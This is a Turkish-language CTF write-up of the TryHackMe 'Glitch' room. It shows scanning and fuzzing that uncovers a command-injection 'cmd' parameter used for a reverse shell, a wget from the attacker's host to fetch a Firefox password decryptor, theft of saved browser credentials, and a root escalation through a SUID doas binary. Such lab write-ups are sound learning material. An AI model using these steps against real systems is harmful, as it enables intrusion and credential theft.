Post

GLITCH

Posted Updated
Preview Image
By Umut Sağlam 4 min read

This is a simple challenge in which you need to exploit a vulnerable web application and root the machine. It is beginner oriented, some basic JavaScript knowledge would be helpful, but not mandatory

GLITCH

What is your access token?

nmap komutu:

1
2

┌──(root㉿kali)-[~]
└─# nmap -T4 -sV 10.10.32.188

nmap çıktısı:

1
2
3
4
5
6
7

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-30 17:49 EDT
Nmap scan report for 10.10.32.188 (10.10.32.188)
Host is up (0.12s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80 portunda çalışan websitesini ziyaret edelim.

Web sitesine erişirken pek bir şey olmuyor. Bulduğumuz tek şey bir fotoğraf. Kaynak koduna bakıldığında getAccess adlı bir JavaScript fonksiyonu var fakat çağrılmamış. Fonksiyon, /api/access’e bir GET isteğinde bulunduğunda ve yanıtı konsola kaydediyor.

Token base64 ile kodlanmış.CyberChef sitesinden kodu decode ediyorum.

What is the content of user.txt?

Bulduğumuz token’ı kullandığımızda sayfaya erişiyoruz.

Siteyi hangi ruh hastası hazırladıysa kendisini tebrik ediyorum.

Gobuster ile dizin taraması yapıyorum.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

┌──(root㉿kali)-[~]
└─# gobuster dir --wordlist=/usr/share/wordlists/dirb/big.txt --url http://10.10.32.188/api -t 40
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.32.188/api
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/access               (Status: 200) [Size: 36]
/items                (Status: 200) [Size: 169]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================

/items dizini inceliyorum.

İstek GET metodu ile gidiyor POST olarak değiştiriyorum.

Eksik bir parametre olmalı.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

┌──(root㉿kali)-[~]
└─# wfuzz -X POST -w /usr/share/wordlists/SecLists/Fuzzing/1-4_all_letters_a-z.txt --hh=45 http://10.10.16.166/api/items?FUZZ=zart
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.16.166/api/items?FUZZ=zart
Total requests: 475254

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                             
=====================================================================

000002370:   500        10 L     64 W       1081 Ch     "cmd"

Varsayımım doğruydu, URL bir cmd parametresi alıyor.

cmd parametesine reverse shell kodu yazıyorum ve post metoduyla gönderiyorum.

Makineye erişim sağladık.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

user@ubuntu:/var/web$ cd /home
lcd /home
user@ubuntu:/home$ s
ls
user
v0id
user@ubuntu:/home$ cd user
cd userl
user@ubuntu:~$ s
ls
user.txt
user@ubuntu:~$ cat user.txt
cat user.txt
THM{-----}
user@ubuntu:~$

What is the content of root.txt?

user klasöründeki .firefox dosyası dikkatimi çekti. Firefox_decrypt scripti ile dosyayı açtım.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

user@ubuntu:~$ ls -la
ls -la
total 48
drwxr-xr-x   8 user user  4096 Jan 27  2021 .
drwxr-xr-x   4 root root  4096 Jan 15  2021 ..
lrwxrwxrwx   1 root root     9 Jan 21  2021 .bash_history -> /dev/null
-rw-r--r--   1 user user  3771 Apr  4  2018 .bashrc
drwx------   2 user user  4096 Jan  4  2021 .cache
drwxrwxrwx   4 user user  4096 Jan 27  2021 .firefox
drwx------   3 user user  4096 Jan  4  2021 .gnupg
drwxr-xr-x 270 user user 12288 Jan  4  2021 .npm
drwxrwxr-x   5 user user  4096 Apr 30 21:48 .pm2
drwx------   2 user user  4096 Jan 21  2021 .ssh
-rw-rw-r--   1 user user    22 Jan  4  2021 user.txt
user@ubuntu:~$ cd .firefox
cd .firefox
user@ubuntu:~/.firefox$ ls -la
ls -la
total 20
drwxrwxrwx  4 user user 4096 Jan 27  2021 .
drwxr-xr-x  8 user user 4096 Jan 27  2021 ..
drwxrwxrwx 11 user user 4096 Jan 27  2021 b5w4643p.default-release
drwxrwxrwx  3 user user 4096 Jan 27  2021 Crash Reports
-rwxrwxr-x  1 user user  259 Jan 27  2021 profiles.ini
user@ubuntu:~/.firefox$ wget 10.9.1.150:80/firefox_decrypt.py
wget 10.9.1.150:80/firefox_decrypt.py
--2024-04-30 22:39:43--  http://10.9.1.150/firefox_decrypt.py
Connecting to 10.9.1.150:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39322 (38K) [text/x-python]
Saving to: ‘firefox_decrypt.py’

     0K .......... .......... .......... ........             100%  241K=0.2s

2024-04-30 22:39:43 (241 KB/s) - ‘firefox_decrypt.py’ saved [39322/39322]

user@ubuntu:~/.firefox$ chmod 777 firefox_decrypt.py
chmod 777 firefox_decrypt.py
user@ubuntu:~/.firefox$ python3 firefox_decrypt.py .
Select the Mozilla profile you wish to decrypt
1 -> hknqkrn7.default
2 -> b5w4643p.default-release
2

Website:   https://glitch.thm
Username: 'v0id'
Password: '---'

v0id kullanıcına geçebiliriz.

1
2
3
4
5
6
7

user@ubuntu:/var/web$ su v0id
su v0id
Password: 

v0id@ubuntu:/var/web$ id
id
uid=1001(v0id) gid=1001(v0id) groups=1001(v0id)

v0id kullanıcısının kullanabileceği bir program yok

1
2
3
4
5

v0id@ubuntu:/var/web$ sudo -l
sudo -l
[sudo] password for v0id: 

Sorry, user v0id may not run sudo on ubuntu.

Fakat SUID dosyası var.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

v0id@ubuntu:~$ find / -type f -user root -perm -u=s 2>/dev/null
find / -type f -user root -perm -u=s 2>/dev/null
/bin/ping
/bin/mount
/bin/fusermount
/bin/umount
/bin/su
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newuidmap
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/doas

/usr/local/bin/doas ı kullanabiliriz.

1
2
3
4
5
6
7
8
9

v0id@ubuntu:~$ doas -u root /bin/bash
doas -u root /bin/bash
Password:

root@ubuntu:/home/v0id# cd /root
cd /root
root@ubuntu:~# cat root.txt
cat root.txt
THM{---}

fsoc

TryHackMe
Easy
This post is licensed under CC BY 4.0 by the author.